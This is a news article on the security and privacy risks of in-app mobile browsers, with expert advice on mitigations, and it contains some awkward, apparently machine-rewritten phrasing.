Browser security risks in the app and what to do about them
Meta and TikTok were quick to declare their activities to be benign, but their historical behavior coupled with the potential for other apps or malicious actors to abuse/exploit this ability is concerning, especially when browsing through the app. is performed on work devices that connect to corporate networks and store business information. Security teams should therefore be aware of the threats that in-app browsers can pose to an organization and take steps to help address the risks.
What are in-app browsers?
In-app browsers are used by apps when a user clicks a link to a regular web page from inside the app, DNSFilter senior security researcher Peter Lowe tells CSO. “Instead of opening in the page in the mobile device’s default browser like Safari or Chrome, it opens in an embedded version that runs inside the app itself,” it adds. he. Since the browser doesn’t run externally, this gives the app more control over the browser.
What security risks do in-app browsers pose?
It’s this increased control that can introduce the kinds of code injection and data tracking issues that Krause has highlighted, Lowe says. “What has been shown is that some very popular apps – including TikTok and Instagram – seem to be using it to track users, to the point where individual keystrokes are monitored and the tracking code is added to each page. This bypasses the app store policies put in place to prevent this sort of thing, but due to the way apps and policies are designed, it currently exists as a loophole.
When it comes to the security risks associated with in-app browsers, one of the most crucial aspects a business needs to consider is how it handles sensitive data and privacy, said Jens Monrad, director , Head of Mandiant Intelligence EMEA, at CSO. “We use our phones for everything, including business. This means there are many opportunities for critical information to be compromised or leaked – intentionally or unintentionally.
Another risk companies need to consider is that app users almost never have the time or patience to go through the entire user rights and consent guide. Typically, they can be over 30 pages, says Monrad. “While much of the data collection that occurs is benign, users may end up consenting to things they are unaware of, such as tracking their credentials or location.”
Once collected, such information is golden in the hands of cybercriminals as it allows them to clone a web session with all web settings such as browser version (agent version), locally available languages, cookies and other user-specific information, adds Dmitry. Bestuzhev, BlackBerry’s most distinguished threat researcher. “This way, cybercriminals can bypass the anti-fraud systems run by financial organizations to identify their recurring customers. It is the effect of a wolf in sheep’s clothing.
Besides collecting credentials, in-app browsers can also be exploited for cryptocurrency mining, Bestuzhev says. “It’s especially painful when the browser is closed but running in the background. Most modern browsers include this feature, so mining cryptocurrency through the browser can work even when the browser is apparently firm.
How to Mitigate Browser Security Risks in the App
Mitigating the threats posed by in-app browsers isn’t always straightforward, but businesses can take steps to reduce the risk. “It is possible to configure an application to properly launch an external browser for link clicks rather than displaying the page inside the application, and even if the application itself has not been configured that way, a user can click ‘open in Safari’ (or whatever browser they’re using) while viewing the page, to launch it in an external browser instead,” says Lowe. configure apps to open in an external browser when possible and notify users that this is happening so that they are more aware of their activities when browsing a page from within of an app.”
More cautious organizations may opt to completely prevent access to certain applications on corporate devices using mobile device management (MDM) solutions, Monrad says. “This allows companies to enforce certain restrictions on the device while ensuring the integrity of the device. Organizations can effectively create a secure container in the phone where business operations can take place and where access to certain apps and software updates can be more tightly controlled.
For Bestuzhev, the first thing to do is to set policies allowing or denying approved and unapproved browsers for use. “It can be archived via black/white list, default deny technologies and AD [Active Directory] policies deployed on the terminal, he adds. “If the network is based on Microsoft technologies, there is a granular policy to deploy from AD to the endpoints for Edge. Edge is a modern chromium-based browser, which can be configured to refuse in-app plugins. It’s also important to have a good endpoint protection product, so if there is an attempt to circumvent it, your endpoint product may block it based on in-app program code analysis.
Newer mobile operating system versions of iOS and Android offer granular security controls that allow end-user choices regarding access to the clipboard feature in apps, sharing precise location data, etc., says Monrad. “Additionally, users can also be notified of apps trying to use cameras or audio. While this doesn’t fully mitigate the risk, I think it’s a step in the right direction that companies may also consider as part of their guidelines for employees and mobile devices.
On that note, user education and in-app browser risk awareness is also important, Lowe says. “Fortunately, general awareness has been raised at this point, so we can expect some changes to the mechanics behind embedded browsers in the future. Work is certainly underway to prevent app developers from abusing this feature and we can expect concrete fixes at some point.
Copyright © 2022 IDG Communications, Inc.